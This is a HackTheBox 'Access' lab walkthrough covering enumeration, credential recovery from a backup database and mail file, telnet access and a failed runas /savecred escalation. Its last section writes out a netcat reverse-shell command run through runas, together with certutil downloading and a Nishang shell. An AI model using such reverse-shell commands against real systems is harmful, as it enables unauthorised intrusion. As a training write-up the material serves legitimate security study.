Windows Privilege Escalation Through Runas | HackTheBox Access | CREST CRT Track
HackTheBox Access was a simple Windows box, which is good to have around because new Windows users can find it hard to know where to look. It also didn't use SMB, unlike many other Windows boxes. We'll begin by retrieving a zip file and an Access database over anonymous FTP. We'll use command-line tools to pull a zip-compatible password out of the database, open the archive and find an Outlook mail file. Reading the mail gives us the password of an account on the box, which we use to connect over telnet. From there, the intended route to root.txt is to use cached administrator credentials through runas; this session gets as far as that step.
1. Initial Scan
I kicked things off with an Nmap scan (`nmap -A <IP_address>`) to see what services were running. This revealed three open ports:
- Port 21 (FTP): This allowed anonymous access.
- Port 23 (Telnet): A potential login point.
- Port 80 (HTTP): A simple web page with nothing obviously exploitable.
2. FTP Exploration
I logged into the FTP server anonymously. It was crucial to enable binary mode (`binary`) so that the files downloaded intact; in the default ASCII mode the client rewrites line endings and corrupts binary files such as databases and archives. I found two directories, `backups` and `engineer`. From `backups` I downloaded a database file named `backup.mdb`; from `engineer` I downloaded a zip file.
3. Database Analysis (MDB File)
Instead of using Microsoft Access, I opted for the Linux mdbtools utilities. `mdb-tables backup.mdb` lists the tables in the database, and one named `authentication_user` stood out. To query it I used `mdb-sql backup.mdb`:
- First, I pulled the usernames: `select username from authentication_user; go`. This revealed the users `admin`, `engineer` and `backup_admin`.
- Then I pulled the passwords: `select password from authentication_user; go`. This returned `admin`, `access_for_you`, `@security` and `admin`. The password for the `engineer` user was `access_for_you`.
4. Zip File Analysis
I attempted to unzip the archive with `unzip`, but it neither prompted for a password nor extracted anything. `7z e <zip_file_name>` did prompt for a password, and `@security` (found in the database) extracted the contents, revealing a `.pst` file (an Outlook data file).
5. PST File Analysis
To read the `.pst` file without Outlook I used the `readpst` tool, which extracts each mailbox as a plain-text mbox file. `cat <mailbox_file_name>` then showed the contents of an email. The email, sent to `security@accesscontrolsystem.com`, revealed a new password for the `security` account: `access_for_you`.
6. Telnet Access
I used the credentials from the email (username `security`, password `access_for_you`) to log in over Telnet (`telnet <IP_address>`); note that telnet sends the credentials in cleartext. Unfortunately, the shell was extremely unstable and slow, which foreshadowed later difficulties.
7. Privilege Escalation Attempt (and Frustration!)
I navigated to the `Public\Desktop` directory and found a shortcut (`.lnk`) file. `type <link_file_name>` showed its contents, which included a `runas` command: `runas /user:administrator /savecred <command>`. The `/savecred` switch tells `runas` to use a credential previously saved in Windows Credential Manager for that account, so the command runs as administrator without prompting for a password, provided an administrator credential has actually been stored on the box.
My goal was to use `runas` to get a reverse shell as administrator. I first downloaded `netcat` to the target machine using `certutil`. I then tried various `runas` commands to execute `netcat` and connect back to my machine, for example:
`runas /user:administrator /savecred "c:\path\to\nc.exe <my_IP> <port> -e cmd.exe"`
- I also tried specifying the full path to `runas.exe` (`c:\windows\system32\runas.exe`).
To get a more stable shell, I even attempted to use a Nishang PowerShell reverse shell to connect back to my machine.
Regrettably, none of the `runas` commands worked. The shell was simply too buggy, and `runas` itself didn't seem to function correctly on this particular machine. Even running `runas` by itself didn't produce any output.
Conclusion
Due to the extreme instability and the issues with the `runas` command, I wasn't able to get the root flag in this session. It's a common frustration with some retired Hack The Box machines: they can be quite buggy! I encourage you to try it yourself, and if you find a way that works, please share it in the comments!